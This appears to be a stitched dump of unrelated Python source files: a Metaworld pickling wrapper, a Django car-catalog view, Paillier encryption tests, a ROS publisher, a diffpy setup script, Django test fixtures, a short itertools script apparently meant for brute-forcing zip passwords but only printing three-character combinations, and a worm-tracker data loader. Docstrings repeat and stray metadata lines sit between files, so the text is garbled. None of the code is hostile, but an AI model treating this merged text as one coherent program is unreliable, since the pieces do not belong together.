from metaworld.benchmarks import ML1, ML10, ML45 class ML1WithPinnedGoal(ML1): """A wrapper of ML1 environment that retains goals across pickling and unpickling. `env = ML1.get_train_tasks('task-name')` gives an environment that internally keeps 50 pre-generated variants of this task, and `env.sample_task(1)` will return one of these variants. However, these variants cannot survive pickling. That is, `pickle.loads(pickle.dumps(env))` will give an environment with a new set of variants, which is not desired when doing vectorized and parallel sampling. This wrapper solves this caveat by saving and restoring the parameter of a variant, i.e. the goal of the task, explicitly. See discussion at https://github.com/icml2020submission6857/metaworld/issues/24#issuecomment-576996005 """ def __getstate__(self): state = super().__getstate__() state['goals'] = self._discrete_goals return state def __setstate__(self, state): super().__setstate__(state) self.discretize_goal_space(state.get('goals', {})) class ML10WithPinnedGoal(ML10): """A wrapper of ML1 environment that retains goals across pickling and unpickling. `env = ML1.get_train_tasks('task-name')` gives an environment that internally keeps 50 pre-generated variants of this task, and `env.sample_task(1)` will return one of these variants. However, these variants cannot survive pickling. That is, `pickle.loads(pickle.dumps(env))` will give an environment with a new set of variants, which is not desired when doing vectorized and parallel sampling. This wrapper solves this caveat by saving and restoring the parameter of a variant, i.e. the goal of the task, explicitly. See discussion at https://github.com/icml2020submission6857/metaworld/issues/24#issuecomment-576996005 """ def __getstate__(self): state = super().__getstate__() state['goals'] = self._discrete_goals return state def __setstate__(self, state): super().__setstate__(state) self.discretize_goal_space(state.get('goals', {})) class ML45WithPinnedGoal(ML45): """A wrapper of ML1 environment that retains goals across pickling and unpickling. `env = ML1.get_train_tasks('task-name')` gives an environment that internally keeps 50 pre-generated variants of this task, and `env.sample_task(1)` will return one of these variants. However, these variants cannot survive pickling. That is, `pickle.loads(pickle.dumps(env))` will give an environment with a new set of variants, which is not desired when doing vectorized and parallel sampling. This wrapper solves this caveat by saving and restoring the parameter of a variant, i.e. the goal of the task, explicitly. See discussion at https://github.com/icml2020submission6857/metaworld/issues/24#issuecomment-576996005 """ def __getstate__(self): state = super().__getstate__() state['goals'] = self._discrete_goals return state def __setstate__(self, state): super().__setstate__(state) self.discretize_goal_space(state.get('goals', {}))
en
0.879184
A wrapper of ML1 environment that retains goals across pickling and unpickling. `env = ML1.get_train_tasks('task-name')` gives an environment that internally keeps 50 pre-generated variants of this task, and `env.sample_task(1)` will return one of these variants. However, these variants cannot survive pickling. That is, `pickle.loads(pickle.dumps(env))` will give an environment with a new set of variants, which is not desired when doing vectorized and parallel sampling. This wrapper solves this caveat by saving and restoring the parameter of a variant, i.e. the goal of the task, explicitly. See discussion at https://github.com/icml2020submission6857/metaworld/issues/24#issuecomment-576996005 A wrapper of ML1 environment that retains goals across pickling and unpickling. `env = ML1.get_train_tasks('task-name')` gives an environment that internally keeps 50 pre-generated variants of this task, and `env.sample_task(1)` will return one of these variants. However, these variants cannot survive pickling. That is, `pickle.loads(pickle.dumps(env))` will give an environment with a new set of variants, which is not desired when doing vectorized and parallel sampling. This wrapper solves this caveat by saving and restoring the parameter of a variant, i.e. the goal of the task, explicitly. See discussion at https://github.com/icml2020submission6857/metaworld/issues/24#issuecomment-576996005 A wrapper of ML1 environment that retains goals across pickling and unpickling. `env = ML1.get_train_tasks('task-name')` gives an environment that internally keeps 50 pre-generated variants of this task, and `env.sample_task(1)` will return one of these variants. However, these variants cannot survive pickling. That is, `pickle.loads(pickle.dumps(env))` will give an environment with a new set of variants, which is not desired when doing vectorized and parallel sampling. This wrapper solves this caveat by saving and restoring the parameter of a variant, i.e. the goal of the task, explicitly. See discussion at https://github.com/icml2020submission6857/metaworld/issues/24#issuecomment-576996005
2.379863
2
catalog/views.py
matteostori/FerrariCatalog
0
6623569
<reponame>matteostori/FerrariCatalog from os import listdir from os.path import join from django.shortcuts import render from django.views import generic from FerrariCatalog.settings import BASE_DIR, STATIC_URL from .models import Car, Pilot # Create your views here. def index(request): """View function for home page of site.""" # Generate counts of some of the main objects num_cars = Car.objects.all().count() num_pilots = Pilot.objects.all().count() num_cars_y= Car.objects.filter(color__exact='yl').count() num_cars_r= Car.objects.filter(color__exact='rd').count() num_cars_b= Car.objects.filter(color__exact='bk').count() num_cars_bl= Car.objects.filter(color__exact='bl').count() context = { 'num_cars': num_cars, 'num_pilots': num_pilots, 'num_cars_y': num_cars_y, 'num_cars_r': num_cars_r, 'num_cars_b': num_cars_b, 'num_cars_bl': num_cars_bl, } # Render the HTML template index.html with the data in the context variable return render(request, 'index.html', context=context) #about page def about(request): return render(request, 'about.html') #simple view for listing all cars (paginated) class CarsListView(generic.ListView): paginate_by = 8 model = Car #detailed view of each car class CarsDetailView(generic.DetailView): model = Car def get_context_data(self, **kwargs): context = super(CarsDetailView, self).get_context_data(**kwargs) images_list = [] carimage_set = context['object'].carimage_set.all() if len(carimage_set) > 0: imagepath = carimage_set[0].path imagepath_dir = join(BASE_DIR, 'catalog/') + STATIC_URL + '/img/' + imagepath for f in listdir(imagepath_dir): images_list.append('img/' + imagepath + '/' + f) context['image_list'] = images_list return context #simple view for listing all pilots (paginated) class PilotListView(generic.ListView): paginate_by = 8 model = Pilot #detailed view of each pilot class PilotsDetailView(generic.DetailView): model = Pilot
from os import listdir from os.path import join from django.shortcuts import render from django.views import generic from FerrariCatalog.settings import BASE_DIR, STATIC_URL from .models import Car, Pilot # Create your views here. def index(request): """View function for home page of site.""" # Generate counts of some of the main objects num_cars = Car.objects.all().count() num_pilots = Pilot.objects.all().count() num_cars_y= Car.objects.filter(color__exact='yl').count() num_cars_r= Car.objects.filter(color__exact='rd').count() num_cars_b= Car.objects.filter(color__exact='bk').count() num_cars_bl= Car.objects.filter(color__exact='bl').count() context = { 'num_cars': num_cars, 'num_pilots': num_pilots, 'num_cars_y': num_cars_y, 'num_cars_r': num_cars_r, 'num_cars_b': num_cars_b, 'num_cars_bl': num_cars_bl, } # Render the HTML template index.html with the data in the context variable return render(request, 'index.html', context=context) #about page def about(request): return render(request, 'about.html') #simple view for listing all cars (paginated) class CarsListView(generic.ListView): paginate_by = 8 model = Car #detailed view of each car class CarsDetailView(generic.DetailView): model = Car def get_context_data(self, **kwargs): context = super(CarsDetailView, self).get_context_data(**kwargs) images_list = [] carimage_set = context['object'].carimage_set.all() if len(carimage_set) > 0: imagepath = carimage_set[0].path imagepath_dir = join(BASE_DIR, 'catalog/') + STATIC_URL + '/img/' + imagepath for f in listdir(imagepath_dir): images_list.append('img/' + imagepath + '/' + f) context['image_list'] = images_list return context #simple view for listing all pilots (paginated) class PilotListView(generic.ListView): paginate_by = 8 model = Pilot #detailed view of each pilot class PilotsDetailView(generic.DetailView): model = Pilot
en
0.853968
# Create your views here. View function for home page of site. # Generate counts of some of the main objects # Render the HTML template index.html with the data in the context variable #about page #simple view for listing all cars (paginated) #detailed view of each car #simple view for listing all pilots (paginated) #detailed view of each pilot
2.4016
2
app/src/main/python/test.py
zhongens/AcousticSensing
0
6623570
import math import random import numpy def get_random(): return random.randint(1, 100) def get_sqrt(x): return math.sqrt(x) def calculator(x,y,ope): print("enter python") if ope == "+": return x + y elif ope == "-": return x - y elif ope == "*": return x * y elif ope == "/": return x / y
import math import random import numpy def get_random(): return random.randint(1, 100) def get_sqrt(x): return math.sqrt(x) def calculator(x,y,ope): print("enter python") if ope == "+": return x + y elif ope == "-": return x - y elif ope == "*": return x * y elif ope == "/": return x / y
none
1
3.614145
4
code/data_owner_2/tests/test_paillier.py
ClarkYan/msc-thesis
7
6623571
import random from nose.tools import assert_raises import paillier def test_invmod(): assert_raises(ValueError, paillier.invmod, 0, 7) assert paillier.invmod(1, 7) == 1 p = 101 for i in range(1, p): iinv = paillier.invmod(i, p) assert (iinv * i) % p == 1 def test_keys_int(): priv = paillier.PrivateKey(7, 11, 77) assert priv.l == 60 assert priv.m == 9 pub = paillier.PublicKey(77) assert pub.g == 78 def test_keys_long(): priv, pub = paillier.generate_keypair(256) for i in range(5): assert paillier.invmod(priv.m, pub.n) == priv.l def test_encrypt_non_repeatable(): pub = paillier.PublicKey(15484279*32451217) for i in range(10): pt = random.randint(0, 1000000) assert paillier.encrypt(pub, pt) != paillier.encrypt(pub, pt) def test_decrypt(): for i in range(5): priv, pub = paillier.generate_keypair(64) for j in range(5): pt = long(random.randint(0, 1000000)) ct = paillier.encrypt(pub, pt) assert pt == paillier.decrypt(priv, pub, ct) def test_e_add(): for i in range(5): priv, pub = paillier.generate_keypair(128) for j in range(5): a = long(random.randint(0, 1000000)) b = long(random.randint(0, 1000000)) ca, cb = paillier.encrypt(pub, a), paillier.encrypt(pub, b) cs = paillier.e_add(pub, ca, cb) s = paillier.decrypt(priv, pub, cs) assert a + b == s def test_e_add_const(): for i in range(5): priv, pub = paillier.generate_keypair(128) for j in range(5): a = long(random.randint(0, 1000000)) c = paillier.encrypt(pub, a) for n in range(0, 11): cs = paillier.e_add_const(pub, c, n) s = paillier.decrypt(priv, pub, cs) assert a + n == s def test_e_mul_const(): for i in range(5): priv, pub = paillier.generate_keypair(128) for j in range(5): a = long(random.randint(0, 1000000)) c = paillier.encrypt(pub, a) for n in range(0, 11): cs = paillier.e_mul_const(pub, c, n) s = paillier.decrypt(priv, pub, cs) assert a * n == s
import random from nose.tools import assert_raises import paillier def test_invmod(): assert_raises(ValueError, paillier.invmod, 0, 7) assert paillier.invmod(1, 7) == 1 p = 101 for i in range(1, p): iinv = paillier.invmod(i, p) assert (iinv * i) % p == 1 def test_keys_int(): priv = paillier.PrivateKey(7, 11, 77) assert priv.l == 60 assert priv.m == 9 pub = paillier.PublicKey(77) assert pub.g == 78 def test_keys_long(): priv, pub = paillier.generate_keypair(256) for i in range(5): assert paillier.invmod(priv.m, pub.n) == priv.l def test_encrypt_non_repeatable(): pub = paillier.PublicKey(15484279*32451217) for i in range(10): pt = random.randint(0, 1000000) assert paillier.encrypt(pub, pt) != paillier.encrypt(pub, pt) def test_decrypt(): for i in range(5): priv, pub = paillier.generate_keypair(64) for j in range(5): pt = long(random.randint(0, 1000000)) ct = paillier.encrypt(pub, pt) assert pt == paillier.decrypt(priv, pub, ct) def test_e_add(): for i in range(5): priv, pub = paillier.generate_keypair(128) for j in range(5): a = long(random.randint(0, 1000000)) b = long(random.randint(0, 1000000)) ca, cb = paillier.encrypt(pub, a), paillier.encrypt(pub, b) cs = paillier.e_add(pub, ca, cb) s = paillier.decrypt(priv, pub, cs) assert a + b == s def test_e_add_const(): for i in range(5): priv, pub = paillier.generate_keypair(128) for j in range(5): a = long(random.randint(0, 1000000)) c = paillier.encrypt(pub, a) for n in range(0, 11): cs = paillier.e_add_const(pub, c, n) s = paillier.decrypt(priv, pub, cs) assert a + n == s def test_e_mul_const(): for i in range(5): priv, pub = paillier.generate_keypair(128) for j in range(5): a = long(random.randint(0, 1000000)) c = paillier.encrypt(pub, a) for n in range(0, 11): cs = paillier.e_mul_const(pub, c, n) s = paillier.decrypt(priv, pub, cs) assert a * n == s
none
1
2.242623
2
catkin_ws/src/beginner_tutorials/scripts/message.py
NevzatBOL/ROS-Beginner
2
6623572
<filename>catkin_ws/src/beginner_tutorials/scripts/message.py #!/usr/bin/env python import rospy from beginner_tutorials.msg import Num def talker(): rospy.init_node('message_talker',anonymous=True) pub = rospy.Publisher('talker',Num) r = rospy.Rate(10) msg = Num() msg.num = 4 while not rospy.is_shutdown(): rospy.loginfo(msg) pub.publish(msg) r.sleep() if __name__ == '__main__': try: talker() except rospy.ROSInterruptException: pass
<filename>catkin_ws/src/beginner_tutorials/scripts/message.py #!/usr/bin/env python import rospy from beginner_tutorials.msg import Num def talker(): rospy.init_node('message_talker',anonymous=True) pub = rospy.Publisher('talker',Num) r = rospy.Rate(10) msg = Num() msg.num = 4 while not rospy.is_shutdown(): rospy.loginfo(msg) pub.publish(msg) r.sleep() if __name__ == '__main__': try: talker() except rospy.ROSInterruptException: pass
ru
0.26433
#!/usr/bin/env python
2.462111
2
setup.py
pavoljuhas/diffpy.Structure
19
6623573
<filename>setup.py #!/usr/bin/env python """Objects for storage and manipulation of crystal structure data. Packages: diffpy.structure """ import os import re import sys from setuptools import setup, find_packages # Use this version when git data are not available, like in git zip archive. # Update when tagging a new release. FALLBACK_VERSION = '3.0.1.post0' # determine if we run with Python 3. PY3 = (sys.version_info[0] == 3) # versioncfgfile holds version data for git commit hash and date. # It must reside in the same directory as version.py. MYDIR = os.path.dirname(os.path.abspath(__file__)) versioncfgfile = os.path.join(MYDIR, 'src/diffpy/structure/version.cfg') gitarchivecfgfile = os.path.join(MYDIR, '.gitarchive.cfg') def gitinfo(): from subprocess import Popen, PIPE kw = dict(stdout=PIPE, cwd=MYDIR, universal_newlines=True) proc = Popen(['git', 'describe', '--match=v[[:digit:]]*'], **kw) desc = proc.stdout.read() proc = Popen(['git', 'log', '-1', '--format=%H %ct %ci'], **kw) glog = proc.stdout.read() rv = {} rv['version'] = '.post'.join(desc.strip().split('-')[:2]).lstrip('v') rv['commit'], rv['timestamp'], rv['date'] = glog.strip().split(None, 2) return rv def getversioncfg(): if PY3: from configparser import RawConfigParser else: from ConfigParser import RawConfigParser vd0 = dict(version=FALLBACK_VERSION, commit='', date='', timestamp=0) # first fetch data from gitarchivecfgfile, ignore if it is unexpanded g = vd0.copy() cp0 = RawConfigParser(vd0) cp0.read(gitarchivecfgfile) if len(cp0.get('DEFAULT', 'commit')) > 20: g = cp0.defaults() mx = re.search(r'\btag: v(\d[^,]*)', g.pop('refnames')) if mx: g['version'] = mx.group(1) # then try to obtain version data from git. gitdir = os.path.join(MYDIR, '.git') if os.path.exists(gitdir) or 'GIT_DIR' in os.environ: try: g = gitinfo() except OSError: pass # finally, check and update the active version file cp = RawConfigParser() cp.read(versioncfgfile) d = cp.defaults() rewrite = not d or (g['commit'] and ( g['version'] != d.get('version') or g['commit'] != d.get('commit'))) if rewrite: cp.set('DEFAULT', 'version', g['version']) cp.set('DEFAULT', 'commit', g['commit']) cp.set('DEFAULT', 'date', g['date']) cp.set('DEFAULT', 'timestamp', g['timestamp']) with open(versioncfgfile, 'w') as fp: cp.write(fp) return cp versiondata = getversioncfg() with open(os.path.join(MYDIR, 'README.rst')) as fp: long_description = fp.read() # define distribution setup_args = dict( name = "diffpy.structure", version = versiondata.get('DEFAULT', 'version'), packages = find_packages(os.path.join(MYDIR, 'src')), py_modules = ['diffpy.Structure'], package_dir = {'' : 'src'}, test_suite = 'diffpy.structure.tests', include_package_data = True, zip_safe = False, install_requires = [ 'six', 'pycifrw>=4.2', ], author = '<NAME>', author_email = '<EMAIL>', maintainer = '<NAME>', maintainer_email = '<EMAIL>', url = 'https://github.com/diffpy/diffpy.structure', description = "Crystal structure container " "and parsers for structure formats.", long_description = long_description, long_description_content_type = 'text/x-rst', license = 'BSD-style license', keywords = "crystal structure data storage CIF PDB", classifiers = [ # List of possible values at # http://pypi.python.org/pypi?:action=list_classifiers 'Development Status :: 5 - Production/Stable', 'Environment :: Console', 'Intended Audience :: Science/Research', 'License :: OSI Approved :: BSD License', 'Operating System :: MacOS :: MacOS X', 'Operating System :: Microsoft :: Windows', 'Operating System :: POSIX', 'Operating System :: Unix', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Topic :: Scientific/Engineering :: Chemistry', 'Topic :: Scientific/Engineering :: Physics', ], ) if __name__ == '__main__': setup(**setup_args)
<filename>setup.py #!/usr/bin/env python """Objects for storage and manipulation of crystal structure data. Packages: diffpy.structure """ import os import re import sys from setuptools import setup, find_packages # Use this version when git data are not available, like in git zip archive. # Update when tagging a new release. FALLBACK_VERSION = '3.0.1.post0' # determine if we run with Python 3. PY3 = (sys.version_info[0] == 3) # versioncfgfile holds version data for git commit hash and date. # It must reside in the same directory as version.py. MYDIR = os.path.dirname(os.path.abspath(__file__)) versioncfgfile = os.path.join(MYDIR, 'src/diffpy/structure/version.cfg') gitarchivecfgfile = os.path.join(MYDIR, '.gitarchive.cfg') def gitinfo(): from subprocess import Popen, PIPE kw = dict(stdout=PIPE, cwd=MYDIR, universal_newlines=True) proc = Popen(['git', 'describe', '--match=v[[:digit:]]*'], **kw) desc = proc.stdout.read() proc = Popen(['git', 'log', '-1', '--format=%H %ct %ci'], **kw) glog = proc.stdout.read() rv = {} rv['version'] = '.post'.join(desc.strip().split('-')[:2]).lstrip('v') rv['commit'], rv['timestamp'], rv['date'] = glog.strip().split(None, 2) return rv def getversioncfg(): if PY3: from configparser import RawConfigParser else: from ConfigParser import RawConfigParser vd0 = dict(version=FALLBACK_VERSION, commit='', date='', timestamp=0) # first fetch data from gitarchivecfgfile, ignore if it is unexpanded g = vd0.copy() cp0 = RawConfigParser(vd0) cp0.read(gitarchivecfgfile) if len(cp0.get('DEFAULT', 'commit')) > 20: g = cp0.defaults() mx = re.search(r'\btag: v(\d[^,]*)', g.pop('refnames')) if mx: g['version'] = mx.group(1) # then try to obtain version data from git. gitdir = os.path.join(MYDIR, '.git') if os.path.exists(gitdir) or 'GIT_DIR' in os.environ: try: g = gitinfo() except OSError: pass # finally, check and update the active version file cp = RawConfigParser() cp.read(versioncfgfile) d = cp.defaults() rewrite = not d or (g['commit'] and ( g['version'] != d.get('version') or g['commit'] != d.get('commit'))) if rewrite: cp.set('DEFAULT', 'version', g['version']) cp.set('DEFAULT', 'commit', g['commit']) cp.set('DEFAULT', 'date', g['date']) cp.set('DEFAULT', 'timestamp', g['timestamp']) with open(versioncfgfile, 'w') as fp: cp.write(fp) return cp versiondata = getversioncfg() with open(os.path.join(MYDIR, 'README.rst')) as fp: long_description = fp.read() # define distribution setup_args = dict( name = "diffpy.structure", version = versiondata.get('DEFAULT', 'version'), packages = find_packages(os.path.join(MYDIR, 'src')), py_modules = ['diffpy.Structure'], package_dir = {'' : 'src'}, test_suite = 'diffpy.structure.tests', include_package_data = True, zip_safe = False, install_requires = [ 'six', 'pycifrw>=4.2', ], author = '<NAME>', author_email = '<EMAIL>', maintainer = '<NAME>', maintainer_email = '<EMAIL>', url = 'https://github.com/diffpy/diffpy.structure', description = "Crystal structure container " "and parsers for structure formats.", long_description = long_description, long_description_content_type = 'text/x-rst', license = 'BSD-style license', keywords = "crystal structure data storage CIF PDB", classifiers = [ # List of possible values at # http://pypi.python.org/pypi?:action=list_classifiers 'Development Status :: 5 - Production/Stable', 'Environment :: Console', 'Intended Audience :: Science/Research', 'License :: OSI Approved :: BSD License', 'Operating System :: MacOS :: MacOS X', 'Operating System :: Microsoft :: Windows', 'Operating System :: POSIX', 'Operating System :: Unix', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Topic :: Scientific/Engineering :: Chemistry', 'Topic :: Scientific/Engineering :: Physics', ], ) if __name__ == '__main__': setup(**setup_args)
en
0.633419
#!/usr/bin/env python Objects for storage and manipulation of crystal structure data. Packages: diffpy.structure # Use this version when git data are not available, like in git zip archive. # Update when tagging a new release. # determine if we run with Python 3. # versioncfgfile holds version data for git commit hash and date. # It must reside in the same directory as version.py. # first fetch data from gitarchivecfgfile, ignore if it is unexpanded # then try to obtain version data from git. # finally, check and update the active version file # define distribution # List of possible values at # http://pypi.python.org/pypi?:action=list_classifiers
1.959879
2
backend/medicar/tests/fixture.py
WesGtoX/medicar
2
6623574
<reponame>WesGtoX/medicar<filename>backend/medicar/tests/fixture.py import factory from faker import Faker from medicar.models import ( Specialty, Doctor, Agenda, MedicalAppointment ) fake = Faker(['pt_BR']) class SpecialtyFactory(factory.django.DjangoModelFactory): """Fixture for creating a Specialty""" class Meta: model = Specialty name = factory.Faker('word', ext_word_list=['Cardiologia', 'Pediatria']) class DoctorFactory(factory.django.DjangoModelFactory): """Fixture for creating a Doctor""" class Meta: model = Doctor name = factory.Faker('first_name') crm = factory.Faker('pyint', min_value=1000, max_value=9999, step=1) email = factory.Faker('ascii_email') phone = f'+{fake.msisdn()}' class AgendaFactory(factory.django.DjangoModelFactory): """Fixture for creating an Agenda""" class Meta: model = Agenda day = factory.Faker('date_between', start_date='today', end_date='+1y') schedule = ['00:00', '08:00', '08:30', '09:00', '09:30', '14:00'] @classmethod def _create(cls, model_class, *args, **kwargs): obj = model_class(*args, **kwargs) obj.doctor = DoctorFactory.create(specialty=SpecialtyFactory.create()) obj.save() return obj class MedicalAppointmentFactory(factory.django.DjangoModelFactory): """Fixture for creating a Medical Appointment""" class Meta: model = MedicalAppointment hourly = factory.Faker('word', ext_word_list=['08:00', '08:30', '09:00', '09:30', '14:00'])
import factory from faker import Faker from medicar.models import ( Specialty, Doctor, Agenda, MedicalAppointment ) fake = Faker(['pt_BR']) class SpecialtyFactory(factory.django.DjangoModelFactory): """Fixture for creating a Specialty""" class Meta: model = Specialty name = factory.Faker('word', ext_word_list=['Cardiologia', 'Pediatria']) class DoctorFactory(factory.django.DjangoModelFactory): """Fixture for creating a Doctor""" class Meta: model = Doctor name = factory.Faker('first_name') crm = factory.Faker('pyint', min_value=1000, max_value=9999, step=1) email = factory.Faker('ascii_email') phone = f'+{fake.msisdn()}' class AgendaFactory(factory.django.DjangoModelFactory): """Fixture for creating an Agenda""" class Meta: model = Agenda day = factory.Faker('date_between', start_date='today', end_date='+1y') schedule = ['00:00', '08:00', '08:30', '09:00', '09:30', '14:00'] @classmethod def _create(cls, model_class, *args, **kwargs): obj = model_class(*args, **kwargs) obj.doctor = DoctorFactory.create(specialty=SpecialtyFactory.create()) obj.save() return obj class MedicalAppointmentFactory(factory.django.DjangoModelFactory): """Fixture for creating a Medical Appointment""" class Meta: model = MedicalAppointment hourly = factory.Faker('word', ext_word_list=['08:00', '08:30', '09:00', '09:30', '14:00'])
en
0.898762
Fixture for creating a Specialty Fixture for creating a Doctor Fixture for creating an Agenda Fixture for creating a Medical Appointment
2.223432
2
test_iterator.py
sangeeth98/brute-force-on-zipfiles
0
6623575
<reponame>sangeeth98/brute-force-on-zipfiles<gh_stars>0 import itertools, zipfile, time import concurrent.futures options = 'abcdefghijklmnopqrstuvwxyz0123456789' #combos made to range from 1 character to 8# combos = itertools.product((options),repeat = 3) # x = iter(combos) # def printnext(it): # print(next(it)) # return 0 # with concurrent.futures.ThreadPoolExecutor() as executor: # result = [executor.submit(printnext, x) for _ in range(200)] count = 0 for i in combos: print(i) count+=1 if(count == 200): break
import itertools, zipfile, time import concurrent.futures options = 'abcdefghijklmnopqrstuvwxyz0123456789' #combos made to range from 1 character to 8# combos = itertools.product((options),repeat = 3) # x = iter(combos) # def printnext(it): # print(next(it)) # return 0 # with concurrent.futures.ThreadPoolExecutor() as executor: # result = [executor.submit(printnext, x) for _ in range(200)] count = 0 for i in combos: print(i) count+=1 if(count == 200): break
en
0.776674
#combos made to range from 1 character to 8# # x = iter(combos) # def printnext(it): # print(next(it)) # return 0 # with concurrent.futures.ThreadPoolExecutor() as executor: # result = [executor.submit(printnext, x) for _ in range(200)]
3.002462
3
slide_12.py
JakeRoggenbuck/strategy_presentation_numpy
0
6623576
<gh_stars>0 # Not runnable key = "<KEY>" request_headers = {"X-TBA-Auth-Key": key} {"X-TBA-Auth-Key": "<KEY>"}
# Not runnable key = "<KEY>" request_headers = {"X-TBA-Auth-Key": key} {"X-TBA-Auth-Key": "<KEY>"}
en
0.791515
# Not runnable
1.396844
1
tierpsy/analysis/compress_add_data/getAdditionalData.py
mgh17/tierpsy-tracker
9
6623577
""" # -*- coding: utf-8 -*- Created on Thu Dec 17 10:10:35 2015 @author: ajaver """ import os import stat import xml.etree.ElementTree as ET import tables import numpy as np import csv from collections import OrderedDict #%% Read/Store the XML file with the pixel size and fps info def storeXMLInfo(info_file, masked_image_file): with open(info_file, 'r') as fid: xml_info = fid.read() # if it is empty the xml create a node and exit if not xml_info: with tables.File(masked_image_file, 'r+') as fid: fid.create_array('/', 'xml_info', obj=bytes('', 'utf-8')) return # read the xml and exit root = ET.fromstring(xml_info) x_microns = float(root.findall( './info/stage/steps/equivalent/microns/x')[0].text) y_microns = float(root.findall( './info/stage/steps/equivalent/microns/y')[0].text) x_pixels = float(root.findall( './info/stage/steps/equivalent/pixels/x')[0].text) y_pixels = float(root.findall( './info/stage/steps/equivalent/pixels/y')[0].text) fps = float(root.findall('./info/camera/display/frame/rate')[0].text) pixels2microns_x = x_microns / x_pixels pixels2microns_y = y_microns / y_pixels with tables.File(masked_image_file, 'r+') as fid: if '/xml_info' in fid: fid.remove_node('/', 'xml_info') xml_node = fid.create_array( '/', 'xml_info', obj=bytes( xml_info, 'utf-8')) masks_node = fid.get_node('/', 'mask') masks_node.attrs['fps'] = fps masks_node.attrs['pixels2microns_x'] = pixels2microns_x masks_node.attrs['pixels2microns_y'] = pixels2microns_y # Read the scale conversions, we would need this when we want to convert the pixels into microns pixelPerMicronX = 1/pixels2microns_x pixelPerMicronY = 1/pixels2microns_y normScale = np.sqrt((pixelPerMicronX ** 2 + pixelPerMicronX ** 2) / 2); pixelPerMicronScale = normScale * np.array((np.sign(pixelPerMicronX), np.sign(pixelPerMicronY))); assert np.abs(pixelPerMicronScale[0]) == np.abs(pixelPerMicronScale[1]) masks_node.attrs['microns_per_pixel'] = np.abs(pixelPerMicronScale[0]) masks_node.attrs['xy_units'] = 'micrometers' #%% Read/Store the CSV file with the stage positions def storeStageData(stage_file, masked_image_file): # read motor data from csv with open(stage_file) as fid: reader = csv.reader(fid) data = [line for line in reader] # if the csv lines must be larger than one (a header), othewise it is an # empty file if len(data) <= 1: with tables.File(masked_image_file, 'r+') as fid: dtype = [('real_time', int), ('stage_time', int), ('stage_x', float), ('stage_y', float)] fid.create_table('/', 'stage_log', obj=np.recarray(0, dtype)) return #import pdb # pdb.set_trace() # filter, check and store the data into a recarray header, data = _getHeader(data) csv_dict = _data2dict(header, data) stage_recarray = _dict2recarray(csv_dict) with tables.File(masked_image_file, 'r+') as mask_fid: if '/stage_log' in mask_fid: mask_fid.remove_node('/', 'stage_log') mask_fid.create_table('/', 'stage_log', obj=stage_recarray) return csv_dict def _timestr2sec(timestr): time_parts = [float(x) for x in timestr.split(':')] return sum((60**ii) * part for ii, part in enumerate(time_parts[::-1])) def _getHeader(data): assert data # find header (it is not always the first line) for ii, line in enumerate(data): if line[0] == 'Real Time': break assert(ii < len(line) - 1) header = data.pop(ii) # check that the expected columns are in header expected_header = [ 'Real Time', 'Media Time', 'Location Type', 'Centroid/Stage/Speed X (microns[/second])', 'Centroid/Stage/Speed Y (microns[/second])', 'MER Min X (microns)', 'MER Min Y (microns)', 'MER Width (microns)', 'MER Height (microns)'] assert all(col in expected_header for col in header) return header, data def _data2dict(header, data): # read the csv data into a dictionary where each field is the data from a # column assert data # filter any possible croped data data = [x for x in data if len(x) == len(header)] # save data into a dictionary csv_dict = {} for ii, col_data in enumerate(zip(*data)): csv_dict[header[ii]] = col_data # Check the data is correct # This is not really a necessary assertion this STAGE flag does not seem useuful. #assert all(x == 'STAGE' for x in csv_dict['Location Type']) del csv_dict['Location Type'] # delete this columns # for col_name in ['MER Min X (microns)', 'MER Min Y (microns)', \ #'MER Width (microns)', 'MER Height (microns)']: # if col_name in csv_dict #assert all(not x for x in csv_dict[col_name]) #del csv_dict[col_name] return csv_dict def _dict2recarray(csv_dict): # convert the csv data into a recarray compatible with pytables dat = OrderedDict() dat['real_time'] = np.array([bytes(x, 'utf-8') for x in csv_dict['Real Time']]) dat['stage_time'] = np.array([_timestr2sec(x) for x in csv_dict['Media Time']]) dat['stage_x'] = np.array( [float(d) for d in csv_dict['Centroid/Stage/Speed X (microns[/second])']]) dat['stage_y'] = np.array( [float(d) for d in csv_dict['Centroid/Stage/Speed Y (microns[/second])']]) # convert into recarray (pytables friendly) dtype = [(kk, dat[kk].dtype) for kk in dat] N = len(dat['stage_x']) stage_recarray = np.recarray(N, dtype) for kk in dat: stage_recarray[kk] = dat[kk] return stage_recarray def getAdditionalFiles(video_file): if not (os.path.exists(video_file)): raise FileNotFoundError(video_file) base_name = os.path.splitext(video_file)[0] info_file = base_name + '.info.xml' stage_file = base_name + '.log.csv' info_file = _getValidFile(info_file) stage_file = _getValidFile(stage_file) return info_file, stage_file def hasAdditionalFiles(video_file): try: getAdditionalFiles(video_file) return True except FileNotFoundError: return False def _insertDirectory(original_file, dir2add): dd = os.path.split(original_file) return os.path.join(dd[0], dir2add, dd[1]) def _getValidFile(file_name): if not os.path.exists(file_name): file_name = _insertDirectory(file_name, '.data') if not os.path.exists(file_name): raise FileNotFoundError( 'Additional %s file do not exists.' % file_name) # if (os.stat(file_name).st_size == 0): # raise IOError('%s is empty' % file_name) return file_name #%% main function to store the additional data def storeAdditionalDataSW(video_file, masked_image_file): assert(os.path.exists(video_file)) assert(os.path.exists(masked_image_file)) info_file, stage_file = getAdditionalFiles(video_file) assert(os.path.exists(video_file)) assert(os.path.exists(stage_file)) # store data storeXMLInfo(info_file, masked_image_file) storeStageData(stage_file, masked_image_file) with tables.File(masked_image_file, 'r+') as mask_fid: mask_fid.get_node('/mask').attrs['has_finished'] = 2 # DEPRECATED def walkXML(curr_node, params=[], curr_path=''): ''' Return the structure of a ElementTree into a directory list. I am not really using this function but it is cool. ''' curr_path += '/' + curr_node.tag if len(curr_node) == 0: param.append((curr_path, curr_node.text)) return params for node in curr_node: walkXML(node, params, curr_path)
